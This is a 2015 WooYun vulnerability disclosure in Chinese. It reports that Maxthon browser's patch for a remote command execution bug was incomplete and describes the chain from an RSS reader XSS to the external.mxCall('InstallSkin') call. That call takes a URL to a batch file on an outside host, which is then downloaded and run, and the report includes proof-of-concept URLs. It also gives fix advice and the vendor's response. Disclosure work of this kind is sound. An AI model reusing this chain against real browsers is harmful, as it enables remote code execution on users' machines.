漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-097165
漏洞标题:傲游浏览器修复不当导致依然可远程命令执行
相关厂商:傲游
漏洞作者: 路人甲
提交时间:2015-02-13 18:56
修复时间:2015-05-16 12:58
公开时间:2015-05-16 12:58
漏洞类型:远程代码执行
危害等级:高
自评Rank:15
漏洞状态:厂商已经修复
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-02-13: 细节已通知厂商并且等待厂商处理中
2015-02-15: 厂商已经确认,细节仅向厂商公开
2015-04-11: 细节向核心白帽子及相关领域专家公开
2015-04-21: 细节向普通白帽子公开
2015-05-01: 细节向实习白帽子公开
2015-05-16: 厂商已经修复漏洞并主动公开,细节向公众公开
简要描述:
远看像修了,近看还没修,
也许是修了,只是没修好。
希望傲游新年来能在大家的共同努力下把安全做的越来越好。
详细说明:
1. 距离 这个 WooYun: 傲游浏览器远程命令执行漏洞二 漏洞,傲游已经更新了好几个版本。目前该漏洞已经被公开了。但是对于这个报告中所报告的问题,小问题确实是修了,但是最为关键的“核心”点,却依然没有得到修复。
A. 修复了报告中的“非关键点”,一个傲游域下的XSS。即:http://sso.maxthon.cn/quit.php这个页面被删除。
B. 禁用了 external.mxCall('InstallSkin', "http://xsst.sinaapp.com/test/mx.bat"), 这样使得我们无法向临时目录写入mx.bat
2. 然后上面这些点并非最致命的点, rss reader里可以导致执行命令的XSS却根本没有被修。
原漏洞中的 http://xsst.sinaapp.com/test/mxpoc.xml 直接打开,依然可以打开计算器。
傲游对rss reader里的富文本过滤正则没有做任何的改动。
3. 虽然傲游修复了 原漏洞的 XSS 和 external.mxCall('InstallSkin', ..); 但这两个点实际上并不是最关键的。所以我们很容易再次执行任意命令。
------------------------------------------------------------
4. 其实这个漏洞,连傲游域下的XSS都不需要。
在 mx://res/app/%7B4F562E60-F24B-4728-AFDB-DA55CE1597FE%7D/preview.htm?http://xsst.sinaapp.com/test/mxpoc.xml 这个域下,我们只需要嵌入一个iframe,iframe的src为 http://www.maxthon.cn/,然后通过 iframe.contentWindow.external 即可有权限调用 mxCall函数。
而external.mxCall('InstallSkin', ..); 虽然被禁止了,但是
依然还是可以使用的。。。,治标不治本。
5. 所以我们很容易重新写出下面的利用代码。
6. 接着同原漏洞一样,利用 rss reader 的XSS即可。
漏洞证明:
傲游最新版本: Version: 4.4.4.2000
打开 http://appmaker.sinaapp.com/poc/cn.maxthon/mxpoc_new.xml
可以看到我们的批处理被下载并执行。
修复方案:
1. 可以看到,这次利用里都不需要maxthon.cn的XSS了,所以光修傲游域下的XSS是没用的。
2. 与其禁用external.mxCall('InstallSkin', ..); 还不如,对 external.mxCall('InstallSkin', ..);中皮肤或者插件的路径进行严格的URL判断。不仅安全得多,也容易得多。
3. 一定要修复rss reader这个XSS才行啊。
4. 修复要修要害,不要修无关痛痒的位置啊。
5. 希望傲游新年来能在大家的共同努力下把安全做的越来越好。
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2015-02-15 12:57
厂商回复:
感谢反馈. RSS 中的漏洞下版处理
最新状态:
2015-04-02:4.4.4.3000 修复